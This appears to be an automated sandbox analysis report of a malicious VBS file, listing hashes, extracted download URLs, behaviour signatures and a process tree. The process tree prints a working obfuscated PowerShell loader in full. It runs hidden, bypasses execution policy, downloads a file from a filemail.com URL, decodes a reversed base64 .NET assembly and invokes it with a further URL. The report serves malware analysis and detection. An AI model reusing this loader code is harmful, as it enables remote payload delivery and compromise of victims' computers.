Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
12-11-2024 02:30
Static task
static1
Behavioral task
behavioral1
Sample
76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2.vbs
Resource
win10v2004-20241007-en
General
-
Target
76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2.vbs
-
Size
12KB
-
MD5
8a330624d5189d9bcd491d93c29624c4
-
SHA1
b89dd3334cd355360ae7e6f85a060dbe4de9d01d
-
SHA256
76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2
-
SHA512
9af32c229db64bb133a39e7e3ec12dd269d971734fe2e46c61c0167696d6dc43c7ad274e7cbbcb0c41ac529a3ccdbb2a6e04ee1807cdfbe1dd3af11462016685
-
SSDEEP
96:khBZNNgct8LOgrf8x/JIcBkiYM1z9jRFtRQLNkOAhqL5s7n1muCweU:YBZNUOgrf6/JIcBkiYM1zbuLi7Aub
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exepowershell.exeflow pid Process 3 2808 WScript.exe 4 2808 WScript.exe 8 2604 powershell.exe 9 2604 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 2748 powershell.exe 2604 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 2748 powershell.exe 2604 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
WScript.exeWScript.exepowershell.exedescription pid Process procid_target PID 3056 wrote to memory of 2808 3056 WScript.exe 31 PID 3056 wrote to memory of 2808 3056 WScript.exe 31 PID 3056 wrote to memory of 2808 3056 WScript.exe 31 PID 2808 wrote to memory of 2748 2808 WScript.exe 32 PID 2808 wrote to memory of 2748 2808 WScript.exe 32 PID 2808 wrote to memory of 2748 2808 WScript.exe 32 PID 2748 wrote to memory of 2604 2748 powershell.exe 34 PID 2748 wrote to memory of 2604 2748 powershell.exe 34 PID 2748 wrote to memory of 2604 2748 powershell.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\emksjAafCReiQSFZxSk.vbs"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNoZUxMSURbMV0rJHNoRUxMSURbMTNdKydYJykgKCgnV0V3aW1hZ2VVcmwgPSBUb1JodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maScrJ2xlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0RycrJ3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmcGtfdicrJ2lkPWZkNGY2MTRiYjIwOWM2MmMxNzMwOTQ1MTc2YTA5MCcrJzRmIFRvUjtXRXd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQycrJ2xpZW50O1dFd2ltYWdlQnl0ZXMgPSBXRXd3ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKFdFd2ltYWdlVXJsKTtXRXdpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4JysnLicrJ0dldFN0cmluZyhXRXdpbWFnZUJ5dGVzKTtXRXdzdGFydEZsYWcgPScrJyBUb1I8JysnPEJBU0U2NF9TVEFSVD4+VG9SO1dFd2VuZEZsYWcgPSBUb1I8PEJBU0U2NF9FTkQ+PlRvUjtXRXdzdGFydEluZCcrJ2V4JysnID0gV0V3aScrJ21hZ2VUZXh0LkluJysnZGV4T2YoV0V3c3RhcnRGbGFnKTtXRXcnKydlJysnbmRJbmRleCA9IFdFd2ltYWdlVGV4dC5JbmRleE9mKFdFd2VuZEZsYWcpO1dFd3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXRXdlbmRJbmRleCAtZ3QgV0V3c3RhcnRJbmRleDtXRXdzdGFydEluZGV4ICs9IFdFd3N0YXJ0RmxhZy5MZW5ndGg7V0V3YicrJ2FzZTY0TGUnKyduZ3RoID0gV0V3ZW5kSW5kZXggLSBXRXdzdGFydEluZGV4O1dFd2Jhc2U2NENvbW1hbmQnKycgPSBXRXdpbWFnZVRleCcrJ3QuJysnU3Vic3RyaW5nKFdFd3N0YXJ0SW5kZXgsIFdFd2Jhc2U2NExlbmd0aCk7V0V3YmFzZTY0UmUnKyd2ZXJzZWQgPSAtam9pbiAnKycoV0V3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHRkdyBGb3JFYWNoLU9iamVjdCB7IFdFd18gfSlbLTEuLi0oV0V3YmFzZTY0Q29tbWFuZC5MZW5ndGgpXScrJztXRXdjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0JysnU3RyaW5nKFdFd2Jhc2U2NFJldmVyc2VkKTtXRXdsb2FkZWQnKydBJysnc3NlbWJseScrJyA9IFtTJysneXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYScrJ2QoV0V3Y29tbWFuZEJ5dCcrJ2VzKTtXRXd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKFRvUlZBSVRvUik7V0V3dmFpTWV0aG9kLkludm9rZShXRXdudWxsLCBAKFRvUnR4dC5kc3RlcC9wb3AvdWUucHJneGFteWdyZW5lLmdpZy8vOnB0dGhUb1IsIFRvUmRlc2F0aXZhZCcrJ29Ub1IsICcrJ1RvUmRlc2F0aXZhZG8nKydUb1IsIFRvUmRlc2F0aXZhZG9Ub1IsIFRvUmRlc2F0aScrJ3ZhZG9UJysnb1IsIFRvUjFUb1IsIFRvUmNvbG9yY3BsVG9SLCBUb1JkJysnZXNhdGl2YWRvVG9SLCBUb1JkZXNhdGl2YWRvVG9SLFRvUmRlJysnc2F0aXZhZG9Ub1IsVG9SZGVzYXRpdmFkb1RvUixUb1JkZXNhdGl2YWRvVG9SLFRvUjFUb1IsVG9SZGVzYScrJ3RpdmFkb1RvUiknKycpOycpLlJlUGxhY2UoJ3RkdycsW1NUckluZ11bQ0hBUl0xMjQpLlJlUGxhY2UoJ1RvUicsW1NUckluZ11bQ0hBUl0zOSkuUmVQbGFjZSgnV0V3JyxbU1RySW5nXVtDSEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sheLLID[1]+$shELLID[13]+'X') (('WEwimageUrl = ToRhttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStG'+'rnTICfFhmTKj3LC6SQtIcOc_T35w&pk_v'+'id=fd4f614bb209c62c1730945176a090'+'4f ToR;WEwwebClient = New-Object System.Net.WebC'+'lient;WEwimageBytes = WEwwebClient'+'.DownloadData(WEwimageUrl);WEwimageText = [System.Text.Encoding]::UTF8'+'.'+'GetString(WEwimageBytes);WEwstartFlag ='+' ToR<'+'<BASE64_START>>ToR;WEwendFlag = ToR<<BASE64_END>>ToR;WEwstartInd'+'ex'+' = WEwi'+'mageText.In'+'dexOf(WEwstartFlag);WEw'+'e'+'ndIndex = WEwimageText.IndexOf(WEwendFlag);WEwstartIndex -ge 0 -and WEwendIndex -gt WEwstartIndex;WEwstartIndex += WEwstartFlag.Length;WEwb'+'ase64Le'+'ngth = WEwendIndex - WEwstartIndex;WEwbase64Command'+' = WEwimageTex'+'t.'+'Substring(WEwstartIndex, WEwbase64Length);WEwbase64Re'+'versed = -join '+'(WEwbase64Command.ToCharArray() tdw ForEach-Object { WEw_ })[-1..-(WEwbase64Command.Length)]'+';WEwcommandBytes = [System.Convert]::FromBase64'+'String(WEwbase64Reversed);WEwloaded'+'A'+'ssembly'+' = [S'+'ystem.Reflection.Assembly]::Loa'+'d(WEwcommandByt'+'es);WEwvaiMethod = [dnlib.IO.Home].GetMethod(ToRVAIToR);WEwvaiMethod.Invoke(WEwnull, @(ToRtxt.dstep/pop/ue.prgxamygrene.gig//:ptthToR, ToRdesativad'+'oToR, '+'ToRdesativado'+'ToR, ToRdesativadoToR, ToRdesati'+'vadoT'+'oR, ToR1ToR, ToRcolorcplToR, ToRd'+'esativadoToR, ToRdesativadoToR,ToRde'+'sativadoToR,ToRdesativadoToR,ToRdesativadoToR,ToR1ToR,ToRdesa'+'tivadoToR)'+');').RePlace('tdw',[STrIng][CHAR]124).RePlace('ToR',[STrIng][CHAR]39).RePlace('WEw',[STrIng][CHAR]36) )"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ed91ecadd86067a6f3e03819d160c6b8
SHA143d8fb130f57b3c779d93dbb7d02037082017e83
SHA2568dac40eb7f16bb0a3e52fda1072fe1767a016b69bae1c5948942411473bebbc0
SHA51271768eb0bcb0301ef3d983c339ec0f3ac72c82d70487da6d2fa20c9c76d45bf1acf990feb1f026fe0d77720cb8de14bb68121b58138bd1b42f5eaeb0b844c0e1
-
Filesize
1KB
MD5c1ab9e3c7a5a70259e486e1b35e791dd
SHA1f0f6ebff9ebfac13bf995bccf8193daf58827652
SHA2566cc7e3be7d1abd44b8cd67b15cbc5c86ee366edc63da01e0b1b7544982551738
SHA5129d705558cd936e603ae1db6860fa1f2a7337acf8df787ca1acb9a32c96d0345834b705aac1c503215127fefe01057bd789be276cc2a377dc29c856e0b78fd9d2